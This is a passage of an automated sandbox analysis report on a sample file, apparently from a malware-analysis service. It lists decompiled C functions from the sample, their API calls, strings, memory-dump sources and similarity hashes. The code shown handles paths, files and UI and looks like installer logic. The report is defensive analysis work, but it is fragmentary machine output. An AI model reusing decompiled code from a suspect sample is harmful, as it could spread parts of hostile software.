							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E00406557(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x7a6a00;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x7a9000;
								E0040651A(_t108, (_t78 << 0xb) + 0x7a9000);
							} else {
								E00406461(_t108,  *0x7a8a68);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067A1(_t108);
							}
							goto L38;
						}
						if( *0x7a8ae4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x7a8a64;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E004063E8( *0x7a8a98, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a98 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E00406557(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x00406557
0x00406557
0x00406557
0x0040655d
0x00406562
0x00406573
0x00406573
0x0040657b
0x0040657c
0x0040657d
0x0040657e
0x00406581
0x00406589
0x0040658b
0x0040659c
0x0040659f
0x0040659f
0x004065a3
0x004065a9
0x004065ac
0x00406787
0x00406787
0x00406792
0x0040679e
0x0040679e
0x00000000
0x004065b2
0x004065b7
0x004065cc
0x004065cd
0x004065d3
0x00406765
0x00406773
0x00406776
0x00406776
0x00406767
0x0040676a
0x0040676d
0x0040676f
0x0040676f
0x00406778
0x00406778
0x0040677e
0x00406781
0x004065b4
0x00000000
0x004065b4
0x00000000
0x00406781
0x004065d9
0x004065dc
0x004065eb
0x004065f2
0x004065fe
0x00406601
0x00406604
0x00406605
0x0040660a
0x00406610
0x00406613
0x00406616
0x00406709
0x0040670e
0x00406741
0x00406746
0x0040674b
0x00406750
0x00406750
0x00406755
0x0040675b
0x0040675e
0x00000000
0x0040675e
0x00406710
0x00406713
0x00406716
0x0040672b
0x00406732
0x00406718
0x0040671f
0x0040671f
0x0040673a
0x0040673d
0x00406701
0x00406702
0x00406702
0x00000000
0x0040673d
0x00406623
0x00406627
0x00406627
0x00406628
0x0040662a
0x00406667
0x0040666a
0x0040667a
0x0040667d
0x00406685
0x0040668b
0x0040668b
0x004066e6
0x004066e6
0x004066e8
0x00000000
0x00000000
0x0040668f
0x00406694
0x00406695
0x00406697
0x004066ae
0x004066bc
0x004066c2
0x004066c4
0x004066e2
0x004066e2
0x004066e2
0x00000000
0x004066e2
0x004066ca
0x004066d3
0x004066d6
0x004066dc
0x004066e0
0x00000000
0x00000000
0x00000000
0x004066e0
0x004066a8
0x004066aa
0x004066ac
0x00000000
0x00000000
0x00000000
0x004066ac
0x00000000
0x004066e6
0x00406672
0x00000000
0x0040662c
0x0040664a
0x00406653
0x004066f0
0x004066f4
0x004066fc
0x004066fc
0x00000000
0x004066f4
0x0040665d
0x004066ea
0x004066ee
0x00000000
0x00000000
0x00000000
0x004066ee
0x0040662a
0x00000000
0x004065b7

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406672
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,004055B3,007A0F28,00000000,00000000,0079BD28,76F1EA30), ref: 00406685
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756

Strings

Call, xrefs: 00406581, 00406634, 0040663B, 0040663F, 0040665C, 00406671, 00406684, 00406699, 004066C6, 004066FB, 00406701, 0040671E, 00406731, 0040674F, 00406755, 0040675E, 00406794
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004066F6
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406640

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-1230650788
Opcode ID: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
Instruction ID: 9e459ffa4d797bbc81f49b8710fc234ac44c95668d32beb4df18aeb57a87e6f9
Opcode Fuzzy Hash: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
Instruction Fuzzy Hash: E061D271900206AADF109F64DC40BAE37A5AF55318F22C13BE917B72D0DB7D8AA1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004044DD Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044DD(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x004044ef
0x004045a5
0x00000000
0x004045a5
0x00404500
0x00404504
0x00000000
0x0040451e
0x0040451e
0x00404527
0x00000000
0x00000000
0x00404529
0x00404535
0x00404538
0x00404538
0x0040453e
0x00404544
0x00404544
0x00404550
0x00404556
0x0040455d
0x00404560
0x00404563
0x00404565
0x00404565
0x0040456d
0x00404573
0x00404573
0x0040457d
0x00404582
0x00404585
0x0040458a
0x0040458d
0x0040458d
0x0040459d
0x0040459d
0x00000000
0x004045a0

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004044FA
GetSysColor.USER32(00000000), ref: 00404538
SetTextColor.GDI32(?,00000000), ref: 00404544
SetBkMode.GDI32(?,?), ref: 00404550
GetSysColor.USER32(?), ref: 00404563
SetBkColor.GDI32(?,?), ref: 00404573
DeleteObject.GDI32(?), ref: 0040458D
CreateBrushIndirect.GDI32(?), ref: 00404597

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 307f0adb03de418db05ce456a6e98ecd908ab5abab62206e0655cd74099b0a55
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 702197B1501708BFD7309F28DD08B5BBBF8AF80714B00852EEA92A22E1D738D914CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040647A(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060EB( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E0040608D( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406461( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 004060EB: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406101

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
Instruction ID: be08228a48e351455db253d3f5410474da148bca98ac48c4339161726040cff4
Opcode Fuzzy Hash: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
Instruction Fuzzy Hash: 89510A75D00219AADF20EFD5CA88AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 732D2480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E732D2480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E732D135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E732D12E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M732D25F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E732D13B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E732D13B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x732d506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x732d506c, __eax,  *0x732d506c, 0, 0);
									goto L27;
								case 4:
									__eax = E732D12CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E732D13B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x732d506c =  *0x732d5074 + ( *(__esi + 0x18) - 1) *  *0x732d506c * 2 + 0x18;
									 *__ebx =  *0x732d5074 + ( *(__esi + 0x18) - 1) *  *0x732d506c * 2 + 0x18;
									asm("cdq");
									__eax = E732D1510(__edx,  *0x732d5074 + ( *(__esi + 0x18) - 1) *  *0x732d506c * 2 + 0x18, __edx,  *0x732d5074 + ( *(__esi + 0x18) - 1) *  *0x732d506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E732D12CC(0x732d5044);
					goto L10;
				}
			}

0x732d2494
0x732d2498
0x732d24a3
0x732d24a3
0x732d24aa
0x732d24af
0x00000000
0x00000000
0x732d24b3
0x732d24b6
0x00000000
0x00000000
0x732d24bb
0x732d24c6
0x732d24d6
0x00000000
0x732d24cd
0x732d24cf
0x732d24e5
0x00000000
0x732d24e5
0x732d24bd
0x732d24bd
0x732d24e6
0x732d24e6
0x732d24e8
0x732d24ec
0x732d24ec
0x732d24ef
0x732d24ef
0x732d24f7
0x732d24ff
0x732d2502
0x732d25c1
0x732d25c2
0x732d25cd
0x732d25f7
0x732d25f7
0x732d25dd
0x732d25e9
0x732d25df
0x732d25df
0x732d25df
0x00000000
0x732d2508
0x732d2508
0x00000000
0x732d250f
0x00000000
0x00000000
0x732d2517
0x00000000
0x00000000
0x732d2525
0x732d2527
0x00000000
0x00000000
0x732d2548
0x732d254e
0x732d2551
0x732d2553
0x732d2563
0x00000000
0x00000000
0x732d2530
0x732d2535
0x732d2538
0x732d2539
0x00000000
0x00000000
0x732d256f
0x732d2575
0x732d2576
0x732d2579
0x732d257a
0x732d257c
0x00000000
0x00000000
0x732d2588
0x732d258b
0x732d2597
0x732d2599
0x00000000
0x00000000
0x732d25a5
0x732d25b1
0x732d25b4
0x732d25b6
0x732d25b9
0x00000000
0x00000000
0x732d2508
0x732d2502
0x732d24db
0x732d24e0
0x00000000
0x732d24e0

APIs

GlobalFree.KERNEL32 ref: 732D25C2

Part of subcall function 732D12CC: lstrcpynW.KERNEL32(00000000,?,732D137F,00000019,732D11CA,-000000A0), ref: 732D12DC

GlobalAlloc.KERNEL32(00000040), ref: 732D2548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 732D2563

Strings

@hv, xrefs: 732D2563

Memory Dump Source

Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true

Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID: @hv
API String ID: 4216380887-3217783804
Opcode ID: 155b30b3751b97eb7c05e3092d4423e57a7cee9b81beca0f29e61fce0820cd8f
Instruction ID: 1476978deacdfcd46d0fb692b6af124093fecadeed8701b11766d51506a2acd2
Opcode Fuzzy Hash: 155b30b3751b97eb7c05e3092d4423e57a7cee9b81beca0f29e61fce0820cd8f
Instruction Fuzzy Hash: 3741D1B1538309DFE758EF25E844F2677F8FB88311F10891DE84A86580EB74A5C4DB61

Uniqueness

Uniqueness Score: -1.00%

Function 004067A1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004067A1(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E60(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E16(L"*?|<>/\":", _t5))) == 0) {
							E00405FC5(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004067a3
0x004067ac
0x004067c3
0x004067c3
0x004067ca
0x004067d6
0x004067d6
0x004067d9
0x004067dc
0x004067e1
0x004067e3
0x004067ec
0x004067f0
0x0040680d
0x00406815
0x00406815
0x0040681a
0x0040681c
0x0040681f
0x00406824
0x00406825
0x00406829
0x00406829
0x0040682a
0x00406831
0x00406833
0x0040683a
0x00000000
0x00000000
0x00406842
0x00406848
0x00000000
0x00000000
0x00000000
0x00406848
0x0040684d

